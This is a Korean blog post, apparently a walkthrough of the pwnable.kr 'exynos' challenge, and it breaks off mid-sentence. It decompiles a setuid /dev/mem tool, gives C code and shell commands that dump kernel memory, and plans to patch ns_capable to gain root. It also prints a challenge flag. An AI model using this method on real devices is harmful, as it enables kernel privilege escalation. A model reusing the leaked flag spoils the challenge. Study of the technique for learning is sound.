{"id":3285,"date":"2025-04-11T01:27:26","date_gmt":"2025-04-10T16:27:26","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3285"},"modified":"2025-04-11T01:27:28","modified_gmt":"2025-04-10T16:27:28","slug":"exynos","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3285","title":{"rendered":"exynos"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">How did Samsung accidently mess up their phone?\n\n* there is gcc environment inside the QEMU box.\n* no debugging environment is provided.\n\nssh exynos@pwnable.kr -p2222 (pw: flag of syscall)<\/pre>\n\n\n\n<p>(pw: <code>Must_san1tize_Us3r_p0int3r<\/code>)<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<p>\ud30c\uc77c\uc744 \ud655\uc778\ud574\ubcf4\uba74, <code>exynos-mem<\/code> \uc2e4\ud589 \ud30c\uc77c\uc774 \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n<p>\uc2e4\ud589\uad8c\ud55c\uc774 <strong>4<\/strong>775\ub85c \ub418\uc5b4\uc788\uae30 \ub54c\ubb38\uc5d0 <strong>setuid<\/strong> <strong>\ube44\ud2b8<\/strong>\uac00 \ud65c\uc131\ud654\ub418\uc5b4\uc788\ub2e4. \ub530\ub77c\uc11c \uc2e4\ud589\uc2dc\ud0a4\uba74 \uc77c\ubc18 \uc0ac\uc6a9\uc790\ub354\ub77c\ub3c4 root \uad8c\ud55c\uc73c\ub85c \uc2e4\ud589\ub41c\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/ $ ls -la\ntotal 607\ndrwxr-xr-x   14 0        0             1024 Apr 10 13:21 .\ndrwxr-xr-x   14 0        0             1024 Apr 10 13:21 ..\n-rw-------    1 0        1000           111 Apr 10 14:25 .ash_history\ndrwxr-xr-x    2 0        0             2048 Jul 11  2014 bin\ndrwxr-xr-x    2 0        0             1024 Jul 11  2014 boot\ndrwxr-xr-x    2 0        0             1024 Apr 10 12:16 dev\ndrwxr-xr-x    3 0        0             1024 Jul 11  2014 etc\n-rwsrwxr-x    1 0        0           589585 Nov 24  2015 exynos-mem\ndrwxr-xr-x    6 0        0             1024 Nov 19  2016 lib\nlrwxrwxrwx    1 0        0               11 Jul 11  2014 linuxrc -> bin\/busybox\ndrwx------    2 0        0            12288 Jul 11  2014 lost+found\ndr-xr-xr-x   43 0        0                0 Jan  1  1970 proc\ndrwx------    2 0        0             1024 Apr  5 08:57 root\ndrwxr-xr-x    2 0        0             2048 Jul 11  2014 sbin\ndrwxr-xr-x    2 0        0             1024 Jul 11  2014 sys\ndrwxrwxrwx    2 0        0             1024 Apr 10 13:20 tmp\ndrwxr-xr-x    6 0        0             1024 Jul 11  2014 usr\n\n\/ $ stat \/exynos-mem \n  File: \/exynos-mem\n  Size: 589585    \tBlocks: 1160       IO Block: 1024   regular file\nDevice: 100h\/256d\tInode: 30          Links: 1\nAccess: (4775\/-rwsrwxr-x)  Uid: (    0\/ UNKNOWN)   Gid: (    0\/ UNKNOWN)\nAccess: 2025-04-10 12:37:45.000000000\nModify: 2015-11-24 18:59:20.000000000\nChange: 2015-11-25 09:59:45.000000000<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled src<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>exynos-mem<\/li>\n<\/ul>\n\n\n\n<p><code>\/dev\/mem<\/code> <strong>\ub294<\/strong> \ubb3c\ub9ac \uba54\ubaa8\ub9ac\uc758 \ubaa8\ub4e0 \uc601\uc5ed\uc5d0 \uc0ac\uc6a9\uc790 \uacf5\uac04\uc5d0\uc11c \uc9c1\uc811 \uc811\uadfc\ud560 \uc218 \uc788\ub294 \uc7a5\uce58 \ud30c\uc77c\uc774\ub2e4.<\/p>\n\n\n\n<p><strong>\uc778\uc790\ub294 \ub2e4\uc74c\uacfc \uac19\uc774 \ud30c\uc2f1\ub41c\ub2e4.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>argv[1]<\/code> \u2192 \uc77d\uac70\ub098 \uc4f8 \ubb3c\ub9ac \uc8fc\uc18c<\/li>\n\n\n\n<li><code>argv[2]<\/code> \u2192 \uc77d\uac70\ub098 \uc4f8 \ubc14\uc774\ud2b8 \ud06c\uae30<\/li>\n\n\n\n<li><code>argv[3]<\/code> \u2192 \ubaa8\ub4dc: <strong><code>0<\/code><\/strong>=\uc77d\uae30(read), <strong><code>1<\/code><\/strong>=\uc4f0\uae30(write)<\/li>\n<\/ul>\n\n\n\n<p>\uc774\ub97c \ud14c\uba74 \ub2e4\uc74c\uacfc \uac19\uc774 \uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>\uc608\uc2dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># \ubb3c\ub9ac \uc8fc\uc18c 0x1000\uc5d0\uc11c 256\ubc14\uc774\ud2b8\ub97c \uc77d\uc5b4 \ud45c\uc900 \ucd9c\ub825\uc73c\ub85c \ub364\ud504\n\/exynos-mem 0x1000 256 0\n\n# \ud45c\uc900 \uc785\ub825\uc5d0\uc11c \ub370\uc774\ud130\ub97c \uc77d\uc5b4 \ubb3c\ub9ac \uc8fc\uc18c 0x2000\uc5d0 128\ubc14\uc774\ud2b8 \uc4f0\uae30\necho -n \"\\x01\\x02\\x03...\" | \/exynos-mem 0x2000 128 1<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int v5; \/\/ [sp+8h] [bp-1Ch]\n  int v6; \/\/ [sp+8h] [bp-1Ch]\n  int v7; \/\/ [sp+Ch] [bp-18h]\n  int v8; \/\/ [sp+10h] [bp-14h]\n  int v9; \/\/ [sp+14h] [bp-10h]\n  int v10; \/\/ [sp+18h] [bp-Ch]\n  int v11; \/\/ [sp+1Ch] [bp-8h]\n\n  if ( argc == 4 )\n  {\n    v7 = open(\"\/dev\/mem\", 2, envp);\n    v8 = atoi(argv[1]);\n    v9 = atoi(argv[2]);\n    v10 = atoi(argv[3]);\n    lseek(v7, v8, 0);\n    v11 = malloc(v9);\n    v5 = 0;\n    if ( v10 )\n    {\n      if ( v10 == 1 )\n      {\n        read(0, v11, v9);\n        v5 = write(v7, v11, v9);\n      }\n      else\n      {\n        fwrite(\"wrong mode. 0:read, 1:write\\n\", 1, 28, stderr);\n      }\n      fprintf(stderr, \"processed %d bytes\\n\", v5);\n    }\n    else\n    {\n      read(v7, v11, v9);\n      v6 = write(1, v11, v9);\n      fprintf(stderr, \"processed %d bytes\\n\", v6);\n    }\n  }\n  else\n  {\n    puts(\"usage : exynos-mem [phyaddr] [bytesize] [mode(R\/W-0\/1)]\", argv, envp);\n  }\n  return 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p>\uc774\uc804\uc5d0 \uc5d1\uc2dc\ub178\uc2a4\uce69\uc774 \ud0d1\uc7ac\ub41c \uac24\ub7ed\uc2dc S3 \uae30\uc885\ub54c \uc77c\ubc18 \uc0ac\uc6a9\uc790\uac00 \ubb3c\ub9ac\uba54\ubaa8\ub9ac\ub97c \uc77d\uace0 \uc4f8 \uc218 \uc788\ub294 \ucde8\uc57d\uc810\uc774 \uc788\uc5c8\ub358 \uac83\uc73c\ub85c \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/FSecureLABS\/mercury-modules\/blob\/master\/metall0id\/root\/exynosmem\/exynos-abuse\/jni\/exynos-abuse.c\">https:\/\/github.com\/FSecureLABS\/mercury-modules\/blob\/master\/metall0id\/root\/exynosmem\/exynos-abuse\/jni\/exynos-abuse.c<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/xdaforums.com\/t\/root-security-root-exploit-on-exynos.2048511\">https:\/\/xdaforums.com\/t\/root-security-root-exploit-on-exynos.2048511<\/a><\/p>\n\n\n\n<p>\ucee4\ub110 R\/W\/X \uc138\uadf8\uba3c\ud2b8 \uad6c\ubd84\uc5c6\uc774 \uc77d\uace0 \uc4f0\ub294 \uac83\uc774 \uac00\ub2a5\ud558\uae30\uc5d0 \ucee4\ub110 \ucf54\ub4dc \uc218\uc815\ub3c4 \ucda9\ubd84\ud788 \uac00\ub2a5\ud588\ub2e4.<\/p>\n\n\n\n<p>\uc6b0\uc120 \ub0b4 \uc544\uc774\ub514\uc5b4\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>\/exynos-mem<\/code>\uc744 \ud1b5\ud574 \ubb3c\ub9ac\uba54\ubaa8\ub9ac\ub97c \uc77d\uc5b4 \ucee4\ub110 \ucd94\ucd9c<\/li>\n\n\n\n<li>\ucd94\ucd9c\ub41c \ub370\uc774\ud130\ub97c base64\ub85c \uc778\ucf54\ub529\ud558\uc5ec \ud130\ubbf8\ub110\uc5d0 \ucd9c\ub825<\/li>\n\n\n\n<li>\ucd9c\ub825\ub41c \ub0b4\uc6a9\uc744 \ubcf5\ubd99\ud574 \ub514\ucf54\ub529<\/li>\n\n\n\n<li><code>ns_capable<\/code> \ud328\uce58 \ubc0f <code>setresuid(0,0,0);<\/code> \ud638\ucd9c\ud558\uc5ec root \uad8c\ud55c \uc0c1\uc2b9<\/li>\n<\/ol>\n\n\n\n<p>\uc6b0\uc120\uc740 <code>\/tmp<\/code> \ub514\ub809\ud1a0\ub9ac\uc5d0 \ud574\ub2f9 \ucf54\ub4dc \uc791\uc131 \ubc0f \ucef4\ud30c\uc77c<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/tmp;\nvi dump.c\n(dump.c \ucf54\ub4dc \uc791\uc131)\ngcc -o dump dump.c<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>dump.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;unistd.h>\n#include &lt;fcntl.h>\n\n\/\/ \uc2e4\ud589 \ub300\uc0c1 \ubc14\uc774\ub108\ub9ac \uacbd\ub85c\n#define TARGET_PROGRAM \"\/exynos-mem\"\n\nint main(int argc, char *argv[]) {\n    if (argc != 4) {\n        fprintf(stderr, \"\uc0ac\uc6a9\ubc95: %s [\ubb3c\ub9ac\uc8fc\uc18c] [\ubc14\uc774\ud2b8\uc218] [\ubaa8\ub4dc(0:\uc77d\uae30, 1:\uc4f0\uae30)]\\n\", argv[0]);\n        return 1;\n    }\n\n    int fd = open(\"mem_dump.bin\", O_CREAT | O_WRONLY | O_TRUNC, 0644);\n    if (fd &lt; 0) {\n        perror(\"open\");\n        return 1;\n    }\n\n    \/\/ stdout(1)\uc744 \ud30c\uc77c\ub85c \ub9ac\ub514\ub809\uc158\n    if (dup2(fd, STDOUT_FILENO) &lt; 0) {\n        perror(\"dup2\");\n        close(fd);\n        return 1;\n    }\n\n    close(fd);\n\n    \/\/ execvp \uc2e4\ud589 \uc778\uc790 \uc900\ube44\n    char *args[] = {\n        TARGET_PROGRAM,\n        argv[1],  \/\/ \ubb3c\ub9ac \uc8fc\uc18c\n        argv[2],  \/\/ \ubc14\uc774\ud2b8 \uc218\n        argv[3],  \/\/ \ubaa8\ub4dc (0: read, 1: write)\n        NULL\n    };\n\n\/\/ >>> 0x60000000+1000000*0\n\/\/ 1610612736 (0x60000000)\n\n\/\/ >>> 0x60000000+1000000*1\n\/\/ 1611612736 (0x600f4240)\n\n\/\/ >>> 0x60000000+1000000*2\n\/\/ 1612612736 (0x601e8480)\n\n\/\/ >>> 0x60000000+1000000*3\n\/\/ 1613612736 (0x602dc6c0)\n\n\/\/ >>> 0x60000000+1000000*4\n\/\/ 1614612736 (0x603d0900)\n\n\/\/ >>> 0x60000000+1000000*5\n\/\/ 1615612736 (0x604c4b40)\n\n\/\/ >>> 0x60000000+1000000*6\n\/\/ 1616612736 (0x605b8d80)\n\n\n    \/\/ \ud504\ub85c\uadf8\ub7a8 \uc2e4\ud589\n    execvp(args[0], args);\n\n    \/\/ \uc2e4\ud328\ud560 \uacbd\uc6b0\n    perror(\"execvp\");\n    return 1;\n}<\/pre>\n\n\n\n<p>\uc774\uc81c \uc57d\uac04\uc758 \ub178\uac00\ub2e4\ub97c \ud574\uc8fc\uc5b4\uc57c \ud55c\ub2e4.<\/p>\n\n\n\n<p>dump \uc2e4\ud589\ud30c\uc77c\uc744 \uc0dd\uc131\ud588\uc744\ub54c \uc5ec\uc720\uacf5\uac04\uc774 \uc57d 1.4M\ubc16\uc5d0 \uc548\ub418\uc5b4\uc11c \ud55c\ubc88\uc5d0 \ucd94\ucd9c\ud560 \uc218 \uc5c6\ub2e4. \ub530\ub77c\uc11c 7\ubc88\uc880 \ub178\uac00\ub2e4 \ud574\uc904 \ud544\uc694\uac00 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ df -h\nFilesystem                Size      Used Available Use% Mounted on\n\/dev\/root.old            46.5M     42.6M      1.4M  97% \/<\/pre>\n\n\n\n<p>\ucd94\ucd9c\uc2dc\ud0ac\ub824\ub294 \ucee4\ub110\uc758 \ubb3c\ub9ac\uc8fc\uc18c\ub294 <code>\/proc\/iomem<\/code> \uc744 \ud1b5\ud574 \uc5bb\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ cat \/proc\/iomem\n(...)\n60000000-66dfffff : System RAM\n  60008000-60485f3f : Kernel code\n  604ba000-605065cf : Kernel data<\/pre>\n\n\n\n<p>\ub178\uac00\ub2e4 7\ubc88 \uc815\ub3c4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/tmp;\n.\/dump 1610612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1611612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1612612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1613612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1614612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1615612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)\n\n.\/dump 1616612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(\uc778\ucf54\ub529 \ub370\uc774\ud130 \uac00\uc838\uc624\uae30)<\/pre>\n\n\n\n<p>\uadf8\ub807\uac8c \ucd94\ucd9c\ub41c \ub370\uc774\ud130\ub97c \ub2e4 \ubcf5\ubd99\ud574 \ub514\ucf54\ub529\ud574\uc11c \ud558\ub098\uc758 \ud30c\uc77c\ub85c \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">base64 -d 0x60000000.base64 > sram.bin\nbase64 -d 0x600f4240.base64 >> sram.bin\nbase64 -d 0x601e8480.base64 >> sram.bin\nbase64 -d 0x602dc6c0.base64 >> sram.bin\nbase64 -d 0x603d0900.base64 >> sram.bin\nbase64 -d 0x604c4b40.base64 >> sram.bin\nbase64 -d 0x605b8d80.base64 >> sram.bin<\/pre>\n\n\n\n<p>\ub364\ud504\uc2dc\ud0a8 \ucee4\ub110\uc744 IDA Pro\ub85c \uc5f4\uc5b4\ubcf8\ub2e4.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ARM Little-endian<\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"747\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1024x747.png\" alt=\"\" class=\"wp-image-3286\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1024x747.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-300x219.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-768x561.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1536x1121.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5.png 1666w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><code>60000000-66dfffff : System RAM<\/code> \uc774\ubbc0\ub85c,<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ROM\u2019s start address: <code>0x60000000<\/code><\/strong><\/li>\n\n\n\n<li><strong>Input file\u2019s Loading address: <code>0x60000000<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"1024\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-849x1024.png\" alt=\"\" class=\"wp-image-3287\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-849x1024.png 849w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-249x300.png 249w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-768x926.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6.png 1260w\" sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>32-bit mode (No)<\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"474\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-1024x474.png\" alt=\"\" class=\"wp-image-3288\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-1024x474.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-300x139.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-768x355.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><code>ns_capable<\/code> \ud328\uce58<\/h3>\n\n\n\n<p>\ubb38\uc81c\ub294 \ucee4\ub110\uc5d0 \uc2ec\ubcfc\uc774 \uc5c6\uc5b4 \uc5b4\ub290 \uc8fc\uc18c\uc5d0 \uc788\ub294\uc9c0 \ubaa8\ub978\ub2e4.<\/p>\n\n\n\n<p>\ucee4\ub110 \ubc84\uc804\uc740 \ub2e4\uc74c\uacfc \uac19\uc544\uc11c \ud574\ub2f9 \ub77c\uc988\ubca0\ub9ac\ud30c\uc774 \ubc84\uc804\uc758 \uc774\ubbf8\uc9c0\ub97c \ub2e4\uc6b4\ubc1b\uc544 \ucee4\ub110\uc744 \ucd94\ucd9c\ud574\ubcf4\uae30 \ud558\uc600\ub2e4<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ uname -a\nLinux (none) 3.11.4 #13 SMP Fri Jul 11 00:48:31 PDT 2014 armv7l GNU\/Linux<\/pre>\n\n\n\n<p><a href=\"https:\/\/downloads.raspberrypi.org\/raspbian\/images\/raspbian-2014-09-12\">https:\/\/downloads.raspberrypi.org\/raspbian\/images\/raspbian-2014-09-12<\/a><\/p>\n\n\n\n<p>2014-09-09-wheezy-raspbian.img\uc5d0\uc11c kernel.img \ud30c\uc77c\uc744 \ucd94\ucd9c\ud558\uc5ec vmlinux-to-elf \ud234\uc744 \uc774\uc6a9\ud558\uc5ec \uc2ec\ubcfc\uc774 \uc720\uc9c0\ub41c elf \ud30c\uc77c\ub85c \ub9cc\ub4e4 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/marin-m\/vmlinux-to-elf\">https:\/\/github.com\/marin-m\/vmlinux-to-elf<\/a><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@2d0f4d9a440c:~\/pwnable.kr\/exynos\/vmlinux-to-elf$ .\/vmlinux-to-elf .\/kernel.img kernel2.elf\n[+] Kernel successfully decompressed in-memory (the offsets that follow will be given relative to the decompressed binary)\n[+] Version string: Linux version 3.12.28+ (dc4@dc4-XPS13-9333) (gcc version 4.8.3 20140303 (prerelease) (crosstool-NG linaro-1.13.1+bzr2650 - Linaro GCC 2014.03) ) #709 PREEMPT Mon Sep 8 15:28:00 BST 2014\n[+] Guessed architecture: armle successfully in 7.09 seconds\n[+] Found kallsyms_token_table at file offset 0x00519ae0\n[+] Found kallsyms_token_index at file offset 0x00519e50\n[+] Found kallsyms_markers at file offset 0x00519820\n[+] Found kallsyms_names at file offset 0x0049b630\n[+] Found kallsyms_num_syms at file offset 0x0049b620\n[i] Null addresses overall: 0 %\n[+] Found kallsyms_addresses at file offset 0x0046f640\n[+] Base address fallback, using first_symbol_virtual_address (c0008000)\n[+] Successfully wrote the new ELF kernel to kernel2.elf<\/pre>\n\n\n\n<p>\ub77c\uc988\ubca0\ub9ac\ud30c\uc774 \ucee4\ub110 \ubc84\uc804 \uc815\ubcf4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Linux version 3.12.28+ (dc4@dc4-XPS13-9333) (gcc version 4.8.3 20140303 (prerelease) (crosstool-NG linaro-1.13.1+bzr2650 - Linaro GCC 2014.03) ) #709 PREEMPT Mon Sep 8 15:28:00 BST 2014<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ns_capable<\/strong><\/h3>\n\n\n\n<p>\ud2b9\uc815 \uc0ac\uc6a9\uc790 \ub124\uc784\uc2a4\ud398\uc774\uc2a4\uc5d0\uc11c \ud604\uc7ac \ud0dc\uc2a4\ud06c\uac00 \uc9c0\uc815\ub41c \uad8c\ud55c(capability)\uc744 \ubcf4\uc720\ud558\uace0 \uc788\ub294\uc9c0\ub97c \uac80\uc0ac\ud558\ub294 \ud5ec\ud37c \ud568\uc218\uc774\ub2e4.<\/p>\n\n\n\n<p>\ub9ac\ud134\uc740 <code>bool<\/code> \ud0c0\uc785\uc73c\ub85c, <strong>\uad8c\ud55c\uc774 \uc788\uc73c\uba74 <code>true,<\/code> \uc5c6\uc73c\uba74 <code>false<\/code>\ub97c<\/strong> \ubc18\ud658\ud55c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"609\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1024x609.png\" alt=\"\" class=\"wp-image-3289\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1024x609.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-300x178.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-768x457.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1536x913.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8.png 1870w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><code>ns_capable<\/code> \ud568\uc218\uc758 \ub9ac\ud134\uac12\uc744 \ud56d\uc0c1 1\ub85c \ub9ac\ud134\ub418\ub3c4\ub85d \ud328\uce58\ud574\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1020\" height=\"588\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9.png\" alt=\"\" class=\"wp-image-3290\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9.png 1020w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9-300x173.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9-768x443.png 768w\" sizes=\"auto, (max-width: 1020px) 100vw, 1020px\" \/><\/figure>\n\n\n\n<p><code>ns_capable<\/code> \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 opcode\ub97c \uadf8\ub300\ub85c \ubcf5\ubd99\ud574 \ubb38\uc81c\uc11c\ubc84\ub85c\ubd80\ud130 \ucd94\ucd9c\ud588\ub358 \ucee4\ub110\uc5d0\uc11c \uac80\uc0c9\ud558\uba74 \ud558\ub098\uac00 \ub098\ud0c0\ub09c\ub2e4.<\/p>\n\n\n\n<p><code>00 00 A0 13 0C 20 93 05 01 2C 82 03 0C 20 83 05<\/code><\/p>\n\n\n\n<p><code>0x600278B0<\/code> \uc8fc\uc18c\uac00 <code>ns_capable<\/code> \ud568\uc218\uc774\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ROM:600278EC 00 00 A0 13                             MOVNE           R0, #0\nROM:600278F0 0C 20 93 05                             LDREQ           R2, [R3,#0xC]\nROM:600278F4 01 2C 82 03                             ORREQ           R2, R2, #0x100\nROM:600278F8 0C 20 83 05                             STREQ           R2, [R3,#0xC]<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"148\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-1024x148.png\" alt=\"\" class=\"wp-image-3291\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-1024x148.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-300x43.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-768x111.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10.png 1356w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><code>sub_600278B0<\/code> \ud568\uc218\uc5d0\uc11c <code>if (v5)<\/code> 